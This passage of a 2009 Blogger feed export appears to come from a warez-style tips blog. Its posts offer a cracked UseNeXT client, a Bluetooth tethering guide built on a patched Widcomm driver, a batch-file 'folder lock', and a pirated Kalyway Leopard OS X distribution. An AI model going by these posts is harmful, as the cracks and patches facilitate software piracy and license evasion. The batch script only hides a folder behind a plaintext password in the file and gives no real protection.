src="http://2.bp.blogspot.com/_nUlVy6CeF-o/SeSlR58gnvI/AAAAAAAAAN4/pNqRdQDK0mo/s400/4_usenext1.jpg" alt="" id="BLOGGER_PHOTO_ID_5324562386489745138" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_nUlVy6CeF-o/SeSkxfrUQFI/AAAAAAAAANw/BLfkB7tCMgs/s1600-h/2.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 284px; height: 400px;" src="http://4.bp.blogspot.com/_nUlVy6CeF-o/SeSkxfrUQFI/AAAAAAAAANw/BLfkB7tCMgs/s400/2.jpg" alt="" id="BLOGGER_PHOTO_ID_5324561829682495570" border="0" /&gt;&lt;/a&gt;&lt;span style="font-weight: bold;color:Red;" &gt;&lt;span style="color: rgb(0, 0, 0);"&gt;I think guys this is much needed program&lt;/span&gt; &lt;/span&gt;&lt;br /&gt;This is a cracked UseNeXT Client which allows you to create an account without registration. When your account is empty just uninstall, clear registration with Tuneup utilities or something, install it again and a new account waits for you Wink You just need an email address&lt;br /&gt;&lt;br /&gt;Thanks...&lt;br /&gt;&lt;br /&gt;Hope you enjoy it....&lt;br /&gt;&lt;br /&gt;Downlaod:&lt;br /&gt;&lt;a href="http://www.megaupload.com/?d=8PXEW65N"&gt;http://www.megaupload.com/?d=8PXEW65N&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8242227210141674342-7323715859138607063?l=myhistoryweb.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://myhistoryweb.blogspot.com/feeds/7323715859138607063/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8242227210141674342&amp;postID=7323715859138607063' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/7323715859138607063'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/7323715859138607063'/><link rel='alternate' type='text/html' href='http://myhistoryweb.blogspot.com/2009/04/usenext-client-470-cracked.html' title='UseNeXT Client 4.70 Cracked'/><author><name>isaacz</name><uri>http://www.blogger.com/profile/06852367671608479880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_nUlVy6CeF-o/SeSlR58gnvI/AAAAAAAAAN4/pNqRdQDK0mo/s72-c/4_usenext1.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8242227210141674342.post-1562905758833929344</id><published>2009-04-10T20:57:00.000-07:00</published><updated>2009-04-11T00:30:02.003-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tricks'/><title type='text'>Free online on your phone via bluetooth</title><content type='html'>This phone works on nearly all Sony Ericsson Phone, I am not sure regarding others.&lt;br /&gt;&lt;br /&gt;&lt;span style="text-decoration: underline;"&gt;&lt;span style="font-weight: bold;"&gt;You need :&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;A. &lt;span style="font-weight: bold;"&gt;Widcomm v5.0.1.2500 drivers&lt;/span&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/151128972/Widcomm.v5.0.1.2500.Incl.Patch.rar"&gt;http://rapidshare.com/files/151128972/Widcomm.v5.0.1.2500.Incl.Patch.rar&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;B. &lt;span style="font-weight: bold;"&gt;DHCP server&lt;/span&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/151128815/dhcpsrv1.5.rar"&gt;http://rapidshare.com/files/151128815/dhcpsrv1.5.rar&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;-----------------------------------------------------------------------------&lt;br /&gt;&lt;span style="color:red;"&gt;&lt;span style="font-weight: bold;"&gt;On Windows Vista&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;After you install Widcomm bluetooth driver &lt;span style="font-weight: bold;"&gt;with righ&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;t click run as administrator&lt;/span&gt; copy &lt;span style="font-weight: bold;"&gt;BTNeighborhood.dll&lt;/span&gt; &amp;amp; &lt;span style="font-weight: bold;"&gt;wbtapi.dll&lt;/span&gt; from &lt;span style="font-weight: bold;"&gt;WIN/system32&lt;/span&gt; and patch them elsewhere, after that reboot and enter in &lt;span style="font-weight: bold;"&gt;safe mod with comand prompt&lt;/span&gt; and in the cmd write: &lt;span style="font-weight: bold;"&gt;del BTNeighborhood.dll&lt;/span&gt; &amp;amp; &lt;span style="font-weight: bold;"&gt;del wbtapi.dll&lt;/span&gt; after that open task manager and run explorer.exe then copy your patched BTNeighborhood.dll &amp;amp; wbtapi.dll in WIN/system32, reboot in normal mode and follow all the steps.&lt;br /&gt;&lt;span style="color:red;"&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Note:&lt;/span&gt;&lt;/span&gt; Run Widcomm_patcher_v2.exe &lt;span style="font-weight: bold;"&gt;with right click run as administrator&lt;/span&gt; to patch widcomm.&lt;br /&gt;-----------------------------------------------------------------------------&lt;br /&gt;&lt;span style="color:red;"&gt;&lt;span style="font-weight: bold;"&gt;On Windows XP&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;After installing Widcomm drivers, run Widcomm_patcher_v2.exe in &lt;span style="font-weight: bold;"&gt;safe mode&lt;/span&gt; and patch the files it requests. Continue the tutorial back in &lt;span style="font-weight: bold;"&gt;normal mode&lt;/span&gt;.&lt;br /&gt;-----------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;span style="line-height: normal;font-size:85%;" &gt;&lt;span style="font-weight: bold;"&gt;First &lt;/span&gt;&lt;/span&gt;you need to install &lt;span style="font-weight: bold;"&gt;Widcomm bluetooth driver&lt;/span&gt; and follow the instructions in the &lt;span style="font-weight: bold;"&gt;Install.txt&lt;/span&gt;, then go &lt;span style="font-weight: bold;"&gt;Advanced Configuration/Local  Services/Network Access&lt;/span&gt; and select: &lt;span style="font-weight: bold;"&gt;"Allow other devices to access the Internet/LAN via this computer."&lt;/span&gt; After that go to &lt;span style="font-weight: bold;"&gt;Control panel /Network conne&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;ctions&lt;/span&gt; click properties on your default internet connection go to &lt;span style="font-weight: bold;"&gt;advanced tab&lt;/span&gt; and check &lt;span style="font-weight: bold;"&gt;"Allow other network users to connect through this computer's Internet connection."&lt;/span&gt; .And then your Bluetooth Network ip address will be &lt;span style="font-weight: bold;"&gt;192.168.0.1&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_nUlVy6CeF-o/SeBF5y8wJUI/AAAAAAAAANg/osFEJEa1ReA/s1600-h/windcomm1.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 372px;" src="http://2.bp.blogspot.com/_nUlVy6CeF-o/SeBF5y8wJUI/AAAAAAAAANg/osFEJEa1ReA/s400/windcomm1.jpg" alt="" id="BLOGGER_PHOTO_ID_5323331618783372610" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="line-height: normal;font-size:85%;" &gt;&lt;span style="font-weight: bold;"&gt;Second&lt;/span&gt;&lt;/span&gt; you need to configure the DHCP server with:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_nUlVy6CeF-o/SeBFwiTb_QI/AAAAAAAAANY/Vi6LsXFVVxY/s1600-h/dhcp1.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 366px; height: 343px;" src="http://4.bp.blogspot.com/_nUlVy6CeF-o/SeBFwiTb_QI/AAAAAAAAANY/Vi6LsXFVVxY/s400/dhcp1.jpg" alt="" id="BLOGGER_PHOTO_ID_5323331459696295170" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;1. Bluetooth Network adapter IP address after ICS (Internet Conection Sharing) with your default internet conection. &lt;span style="font-weight: bold;"&gt;(leave it like in the picture)&lt;/span&gt;&lt;br /&gt;2. Ip address of the bluetooth network adapter address after ICS (same as 1.) &lt;span style="font-weight: bold;"&gt;(leave it like in the picture)&lt;/span&gt;&lt;br /&gt;3. You Phone MAC address &lt;img src="http://i164.photobucket.com/albums/u40/chinesejesus/mac1.jpg" alt="Image" title="Image" border="0" /&gt; (&lt;span style="font-weight: bold;"&gt;capital letters&lt;/span&gt;)&lt;br /&gt;4. Ip address for your phone (same class as the bluetooth network adapter) &lt;span style="font-weight: bold;"&gt;(if you don't use that ip in the picture you can leave it like that)&lt;/span&gt;&lt;br /&gt;5. Network adapter for the DHCP server to listen (ip address of the bluetooth network adapter address after ICS) (same as 1.) &lt;span style="font-weight: bold;"&gt;(leave it like in the picture)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="line-height: normal;font-size:85%;" &gt;&lt;span style="font-weight: bold;"&gt;Third&lt;/span&gt;&lt;/span&gt; you need to make a new internet profile on your phone that connects to the bluetooth data account. (&lt;span style="font-weight: bold;"&gt;Settings/Connectivity/Internet settings/Internet profiles/New profile/Name (any name)/Connect using/your PC bluetooth name.&lt;/span&gt; Select this profile as &lt;span style="font-weight: bold;"&gt;default&lt;/span&gt; for &lt;span style="font-weight: bold;"&gt;Internet profiles&lt;/span&gt; and &lt;span style="font-weight: bold;"&gt;Settings for java&lt;/span&gt; .)&lt;br /&gt;&lt;br /&gt;&lt;span style="line-height: normal;font-size:85%;" &gt;&lt;span style="font-weight: bold;"&gt;Last &lt;/span&gt;&lt;/span&gt;you need to connect to your computer via &lt;span style="font-weight: bold;"&gt;phone &lt;/span&gt;and ONLY &lt;span style="font-weight: bold;"&gt;phone &lt;/span&gt;from &lt;span style="font-weight: bold;"&gt;Settings/Connectivity/Bluetooth/My Devices/New device&lt;/span&gt;, search for your PC, &lt;span style="font-weight: bold;"&gt;pair&lt;/span&gt; and then click &lt;span style="font-weight: bold;"&gt;Connect&lt;/span&gt; (after you see &lt;span style="font-weight: bold;"&gt;Connected on your phone and PC&lt;/span&gt; your connected to the internet via bluetooth and your bluetooth will not disconnect after you enter and exit a application that needs a internet connection eg: Opera Mini) and every time you want to connect to the internet from your phone &lt;span style="font-weight: bold;"&gt;if your bluetooth disconnects&lt;/span&gt; you have to search and &lt;span style="font-weight: bold;"&gt;pair &lt;/span&gt;you PC from your &lt;span style="font-weight: bold;"&gt;phone &lt;/span&gt; and click &lt;span style="font-weight: bold;"&gt;Connect&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;&lt;span style="line-height: normal;font-size:12;" &gt;&lt;span style="font-weight: bold;"&gt;For this to work you have to use &lt;span style="text-decoration: underline;"&gt;ICS (Internet Conection Sharing)&lt;/span&gt;&lt;/span&gt;&lt;span style="line-height: normal;font-size:18;" &gt;not &lt;/span&gt;&lt;span style="line-height: normal;font-size:12;" &gt;Bridge Connection !&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="text-decoration: underline;"&gt;&lt;span style="font-weight: bold;"&gt;Works with any phone that can connect to Bluetooth PAN (Personal Area Network), eg: SE W660/K800/K810/W850/W880/etc&lt;/span&gt;.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Your done have fun ! :)&lt;br /&gt;&lt;br /&gt;PS. REMEMBER TO ADD THE DHCP SERVER ONTO YOUR FIREWALL LIST (this includes Windows Firewall)&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="text-decoration: underline;"&gt;&lt;span style="line-height: normal;font-size:18;" &gt;VIDEO GUIDE - YOUTUBE&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;http://www.megavideo.com/?v=QCWY809I&lt;br /&gt;http://uk.youtube.com/watch?v=KgRlc4jt2H0&lt;br /&gt;&lt;br /&gt;*Sometimes when i cannot connect, i restart the DCHP server and i also i go on my network connections and i turn off and turn on internet sharing. that normally fixes the problem.&lt;br /&gt;&lt;br /&gt;&lt;span style="line-height: normal;font-size:18;" &gt;&lt;span style="color:blue;"&gt;MOBILE PHONES CONFIRMED TO BE WORKING:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Sony Ericsson:&lt;/span&gt;&lt;br /&gt;k750i&lt;br /&gt;k800i&lt;br /&gt;k810&lt;br /&gt;k850&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;HTC:&lt;/span&gt;&lt;br /&gt;&lt;table align="center" border="0" cellpadding="3" cellspacing="1" width="90%"&gt; &lt;tbody&gt; &lt;/tbody&gt;&lt;/table&gt; HTC Touch&lt;br /&gt;HTC Touch Dual 1 &amp;amp; 2&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8242227210141674342-1562905758833929344?l=myhistoryweb.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://myhistoryweb.blogspot.com/feeds/1562905758833929344/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8242227210141674342&amp;postID=1562905758833929344' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/1562905758833929344'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/1562905758833929344'/><link rel='alternate' type='text/html' href='http://myhistoryweb.blogspot.com/2009/04/free-online-on-your-phone-via-bluetooth.html' title='Free online on your phone via bluetooth'/><author><name>isaacz</name><uri>http://www.blogger.com/profile/06852367671608479880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_nUlVy6CeF-o/SeBF5y8wJUI/AAAAAAAAANg/osFEJEa1ReA/s72-c/windcomm1.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8242227210141674342.post-3493731524750829272</id><published>2009-04-09T07:08:00.001-07:00</published><updated>2009-04-09T07:10:45.715-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tricks'/><title type='text'>How to create a folder lock without any software</title><content type='html'>Hi there,&lt;br /&gt;Here are some easy step to create a folderlock with out any software&lt;br /&gt;&lt;br /&gt;follow the instructions its a helpful trick&lt;br /&gt;&lt;br /&gt;1.copy the code given bellow&lt;br /&gt;&lt;br /&gt;2.open a notepad and paste it then 'Save' it as batch file (with extension '.bat').&lt;br /&gt;for example :&lt;span style="font-weight: bold;"&gt;lock file.bat&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;&lt;span style="font-weight: bold;"&gt;if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; if NOT EXIST Locker goto MDLOCKER&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; :CONFIRM&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; echo Are you sure u want to Lock the folder(Y/N)&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; set/p "cho=&gt;"&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; if %cho%==Y goto LOCK&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; if %cho%==y goto LOCK&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; if %cho%==n goto END&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; if %cho%==N goto END&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; echo Invalid choice.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; goto CONFIRM&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; :LOCK&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; echo Folder locked&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; goto End&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; :UNLOCK&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; echo Enter password to Unlock folder&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; set/p "pass=&gt;"&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; if NOT %pass%==type your password here goto FAIL&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; echo Folder Unlocked successfully&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; goto End&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; :FAIL&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; echo Invalid password&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; goto end&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; :MDLOCKER&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; md Locker&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; echo Locker created successfully&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; goto End&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;3.Then you see a batch file. Double click on this batch file then i will automatic to create a folder name locker.&lt;br /&gt;&lt;br /&gt;4.New folder named 'Locker' would be formed at the same location.&lt;br /&gt;&lt;br /&gt;5.Now open the folder then you can store all the files you want to hide in the 'Locker' folder. Double click on the batch file to lock the folder name'Locker'.&lt;br /&gt;&lt;br /&gt;If you want to unlock your files,double click the batch file again and you would be prompted for password.&lt;br /&gt;&lt;br /&gt;Enter the password and enjoy access to the folder.&lt;br /&gt;Enjoy ^^&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8242227210141674342-3493731524750829272?l=myhistoryweb.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://myhistoryweb.blogspot.com/feeds/3493731524750829272/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8242227210141674342&amp;postID=3493731524750829272' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/3493731524750829272'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/3493731524750829272'/><link rel='alternate' type='text/html' href='http://myhistoryweb.blogspot.com/2009/04/how-to-create-folder-lock-without-any_09.html' title='How to create a folder lock without any software'/><author><name>isaacz</name><uri>http://www.blogger.com/profile/06852367671608479880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8242227210141674342.post-8923305248823032210</id><published>2009-04-06T07:16:00.001-07:00</published><updated>2009-04-06T22:00:09.152-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='OS'/><title type='text'>Mac OS X Kalyway Leopard 10.5.2 DVD Intel Amd.4122511 HTTP Download</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_nUlVy6CeF-o/SdoShzvZ2_I/AAAAAAAAANA/qry-UGRQRbw/s1600-h/MC094.jpeg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 326px; height: 326px;" src="http://1.bp.blogspot.com/_nUlVy6CeF-o/SdoShzvZ2_I/AAAAAAAAANA/qry-UGRQRbw/s400/MC094.jpeg" alt="" id="BLOGGER_PHOTO_ID_5321586281725680626" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_nUlVy6CeF-o/SdoR1Gn7gUI/AAAAAAAAAMo/ztmiDDciSI8/s1600-h/kalyway.gif"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 300px;" src="http://4.bp.blogspot.com/_nUlVy6CeF-o/SdoR1Gn7gUI/AAAAAAAAAMo/ztmiDDciSI8/s400/kalyway.gif" alt="" id="BLOGGER_PHOTO_ID_5321585513700491586" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_nUlVy6CeF-o/SdoR1iPJgBI/AAAAAAAAAM4/a5jXwR2J-zA/s1600-h/Picture+1.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 304px;" src="http://4.bp.blogspot.com/_nUlVy6CeF-o/SdoR1iPJgBI/AAAAAAAAAM4/a5jXwR2J-zA/s400/Picture+1.png" alt="" id="BLOGGER_PHOTO_ID_5321585521112743954" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_nUlVy6CeF-o/SdoR0y5mx6I/AAAAAAAAAMg/NhzmjC2KKCg/s1600-h/index_hero20071009.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 147px;" src="http://2.bp.blogspot.com/_nUlVy6CeF-o/SdoR0y5mx6I/AAAAAAAAAMg/NhzmjC2KKCg/s400/index_hero20071009.png" alt="" id="BLOGGER_PHOTO_ID_5321585508405921698" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Download HTTP Kalyway Leopard 10.5.2 DVD&lt;br /&gt;Requirements:&lt;br /&gt;*Computer with an Intel or AMD, PowerPC G5, or PowerPC G4 (867MHz or faster) processor.&lt;br /&gt;*512MB of memory&lt;br /&gt;*DVD drive for installation&lt;br /&gt;*8GB of available disk space&lt;br /&gt;*Some features require a compatible Internet service provider; fees may apply.&lt;br /&gt;*Some features require Apple's .Mac service; fees apply.&lt;br /&gt;&lt;br /&gt;all ich support&lt;br /&gt;sitll remain problem with micron ide dvd!&lt;br /&gt;based on slipstream script by DENSE&lt;br /&gt;ich9 support by DUNE !:)&lt;br /&gt;if you have problems on reboot with video gfx (blue or black screen)&lt;br /&gt;&lt;br /&gt;All you have to do is just press F8 at Darwin's prompt and then type&lt;br /&gt;-s(single user mode)&lt;br /&gt;then&lt;br /&gt;at root&lt;br /&gt;type&lt;br /&gt;mount -uw /&lt;br /&gt;Vand /movevideodrivers&lt;br /&gt;then it will be prompt to move video drivers by class ( nvidia ; ati ; or intel gma) voila!&lt;br /&gt;type yes to confirm or enter to skip !&lt;br /&gt;Even if you have chosen a kernel at install, you can still try the others kernels after installation&lt;br /&gt;&lt;br /&gt;All you have to do is just press F8 at Darwin's prompt and then type the kernel's name you want to&lt;br /&gt;boot with :&lt;br /&gt;sleepkernel&lt;br /&gt;(intel/amd/sse2/sse3)&lt;br /&gt;speedstepkernel&lt;br /&gt;(intel/amd/sse2/sse3)&lt;br /&gt;qnforcekernel&lt;br /&gt;(intel/sse3)&lt;br /&gt;bmodbinkernel&lt;br /&gt;(intel/amd/sse3)&lt;br /&gt;svanillakernel(intel/sse3)&lt;br /&gt;Kernels&lt;br /&gt;kernel_9.2_sleep&lt;br /&gt;kernel_9.2_speedstep&lt;br /&gt;kernel_922_modbin&lt;br /&gt;kernel_92_nforce&lt;br /&gt;kernel_vanilla_922&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Graphics_Drivers&lt;/span&gt;&lt;br /&gt;Ati_Radeon&lt;br /&gt;X1000Series&lt;br /&gt;ATYinject for 19xx series&lt;br /&gt;NATIT_For_X1000_series&lt;br /&gt;ATIRadeonX1000SeriesGraphics&lt;br /&gt;1950gt_pro&lt;br /&gt;X2000_HD_and_X3000_HD_Series&lt;br /&gt;NATIT_For_X2000_X3000_Series&lt;br /&gt;HD2900xt_pro&lt;br /&gt;white_menus_fixe_HD2600_pro&lt;br /&gt;white_menus_fixe_HD3850_3870x2&lt;br /&gt;ATI_Radeon_HD_2600_Pro_AGP (this one no need for natit and white menufix)&lt;br /&gt;ATI_Radeon_HD_2600_XT_AGP (this one no need for natit and white menufix)&lt;br /&gt;&lt;br /&gt;Nvidia_Geforce (select one only)&lt;br /&gt;NVinject&lt;br /&gt;NVinject-128&lt;br /&gt;NVinject-256&lt;br /&gt;NVinject-320&lt;br /&gt;NVinject-512&lt;br /&gt;NVinject-640&lt;br /&gt;NVinject-768&lt;br /&gt;NVinjectGO&lt;br /&gt;NVinjectGO-512&lt;br /&gt;NVInject_Clevo_M570RU 8700gfx&lt;br /&gt;NATIT_gfnvidia&lt;br /&gt;Intel_GMA&lt;br /&gt;GMA950 (tiger one full accelerated and resolution support but with mouse artifact)&lt;br /&gt;GMAX3100 (not tested)&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Audio_Drivers&lt;/span&gt;&lt;br /&gt;Intel NVIDIA VIA ATI HDAudioController&lt;br /&gt;NVIDIAAC97Audio&lt;br /&gt;Realtek Sigmatel ConexantAnalogDevicesHDAudioCodec (generic output support)&lt;br /&gt;ALC883_DS3,p5k pro etc...&lt;br /&gt;alc889a_shutdown_support&lt;br /&gt;ALC882_p5w_dh_deluxe&lt;br /&gt;sigmatel_9200_inspiron_9400&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Networks_Drivers&lt;/span&gt;&lt;br /&gt;Networks_Cards&lt;br /&gt;AppleBCM440XEthernet&lt;br /&gt;AppleBCM5751Ethernet&lt;br /&gt;AppleRTL8169Ethernet&lt;br /&gt;MarvellNetworkAdapter&lt;br /&gt;RealtekR1000&lt;br /&gt;mskge_marvell&lt;br /&gt;forcedeth&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Wifi_Card&lt;/span&gt;&lt;br /&gt;IO80211Family&lt;br /&gt;AtherosWirelessAdapter&lt;br /&gt;Zydas-ZD1211-1215&lt;br /&gt;wifi_Broadcom_airport&lt;br /&gt;RT2500-RT73-USB&lt;br /&gt;wifi_AP_Realtek_RTL8187L&lt;br /&gt;wifi_Realtek_RTL8187B&lt;br /&gt;iwi2200&lt;br /&gt;Mobo_Chipsets (support for ati ; nvidia ; intel ; via ; sis ; marvell ; jmicron)&lt;br /&gt;AppleNForceATA&lt;br /&gt;AppleOnboardPCATA&lt;br /&gt;AppleVIAATA&lt;br /&gt;AppleGenericPCATA&lt;br /&gt;SiliconImage3132&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Thirds_Applications&lt;/span&gt;&lt;br /&gt;(will be installed in /applications/KOOLSOFTS/)&lt;br /&gt;adium&lt;br /&gt;archives&lt;br /&gt;candybar&lt;br /&gt;changeFinder&lt;br /&gt;colloquy&lt;br /&gt;fairmount&lt;br /&gt;Growl&lt;br /&gt;GmailNotifier&lt;br /&gt;kextHelperB7&lt;br /&gt;Eonyx&lt;br /&gt;macam_iusbcam&lt;br /&gt;MacTheRipper&lt;br /&gt;Proxi&lt;br /&gt;Wpacifist&lt;br /&gt;perian&lt;br /&gt;ppfomatic&lt;br /&gt;SimplyBurns&lt;br /&gt;Ksolarseek&lt;br /&gt;stuffitExpander&lt;br /&gt;dtextmate&lt;br /&gt;transmission&lt;br /&gt;vlc&lt;br /&gt;xbench&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Patches&lt;/span&gt;&lt;br /&gt;Hardcoded_SMBIOS&lt;br /&gt;Lastnetkassmbios with coreplayer fix , mozzy and logmein !&lt;br /&gt;AppleSMBIOS-27-Default&lt;br /&gt;AppleSMBIOS-27-667&lt;br /&gt;AppleSMBIOS-27-800&lt;br /&gt;AppleSMBIOS-27-1066&lt;br /&gt;SMBIOS-27-DDR3-1333&lt;br /&gt;AppleSMBIOS-27-IM&lt;br /&gt;AppleSMBIOS-27-MB&lt;br /&gt;AppleSMBIOS-27-MBMem&lt;br /&gt;AppleSMBIOS-27-MP&lt;br /&gt;OLD tiger SMBIOS_1.0.1&lt;br /&gt;SSE2_Jas1048_ACPI_APIC (may or not work)&lt;br /&gt;AppleACPIPlatform&lt;br 